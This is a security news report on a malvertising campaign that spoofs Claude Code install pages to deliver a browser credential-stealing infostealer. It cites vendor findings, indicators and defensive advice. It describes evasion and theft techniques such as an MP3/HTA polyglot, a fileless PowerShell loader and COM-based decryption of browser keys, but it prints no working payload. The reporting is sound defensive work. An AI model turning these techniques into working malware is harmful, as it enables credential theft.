Fake Claude Code Installers Deliver Credential-Stealing Malware

Security teams have identified an active SEO-poisoning and malvertising campaign that targets people searching for installation guidance for Claude Code. Cyderes' Howler Cell published a technical writeup describing a spoofed install page shown as a sponsored search result that displays a malicious install command; Cyderes reports the delivery chain ends in a reflective .NET infostealer beaconing to 185.177.239.255. Ontinue's Cyber Defence Centre reported parallel findings where a sponsored result points to a domain like events.msft23.com, and a displayed command causes Invoke-RestMethod to fetch a heavily obfuscated PowerShell loader. Malwarebytes and other vendors linked some samples to a backdoor labelled DinDoor that subsequently stages a Deno-based remote access Trojan.

Cyderes' analysis describes a multi-stage, largely fileless chain designed to evade traditional static IOC matching, with an MP3/HTA polyglot used to pass file-type inspection while executing as an HTA when processed by mshta.exe. Ontinue's report states the PowerShell loader performs environment checks, aborting for certain regional settings, then searches Chromium-family browsers for v20 app_bound_encrypted_key and v10 encrypted_key items. Hackread's coverage of Ontinue notes the campaign includes a native helper payload_x64.bin (compiled 24 March 2026 in observed samples) that is injected into a browser process and uses the IElevator2 COM interface to obtain decrypted browser data.

Cyderes and Ontinue both document that attackers place spoofed pages in paid search results to reach users at the point they expect official install instructions. Cyderes details a per-victim subdomain naming scheme derived from MD5(COMPUTERNAME+USERNAME), which reduces the utility of static URL lists for detection. Several writeups highlight fileless post-execution behavior intended to defeat AMSI, EDR telemetry, sandbox analysis, and static detection methods.

Cyderes explicitly states that Anthropic and the legitimate Claude Code install path are not compromised; the campaign impersonates the brand. Multiple independent vendors and researchers have observed similar spoofing and payload patterns across spoofed pages for other developer tools, including trojanized releases on GitHub and SourceForge reported in industry tracking.

Editorial analysis: Companies and open-source ecosystems that grow rapid, developer-facing tool adoption become attractive templates for SEO-poisoning and malvertising. Observers of comparable campaigns note that attackers routinely substitute legitimate command strings with malicious hosts and small code changes, then rely on paid search placements to surface to novices and developers following install guides.

Editorial analysis: For security teams, the campaign underscores two recurring operational risks, first the trust placed in search-ad results and, second, the limitations of static IOCs when attackers use per-host derivation and fileless runtime techniques. Teams responsible for developer workstation security and CI runners should treat developer-facing web flows as an exploitable attack surface and assume that install commands copied from search results require verification.

Editorial analysis: Monitor vendor advisories from Cyderes, Ontinue, Malwarebytes, and Trend Micro for updated IOCs and behavioral indicators. Watch for expanded use of polyglot payloads, additional spoofed domains, and similar campaigns targeting other AI development tools; security researchers have already flagged related spoofing across JetBrains, NotebookLM, and other developer pages. Finally, look for community signals such as GitHub issue reports or package-repository abuse notices that indicate trojanized releases tied to the campaign.

Editorial analysis: Endpoint and web-proxy telemetry that captures script execution contexts, mshta.exe spawning, unusual PowerShell Invoke-RestMethod downloads, and reflective .NET` behaviors are high-value detection points. Observers recommend validating install commands against official vendor documentation and using allowlisting for install sources in managed environments. Security teams should also prioritize detection for credential exfiltration from browser storage formats described in the reports, and correlate suspicious paid-search click paths with downstream telemetry.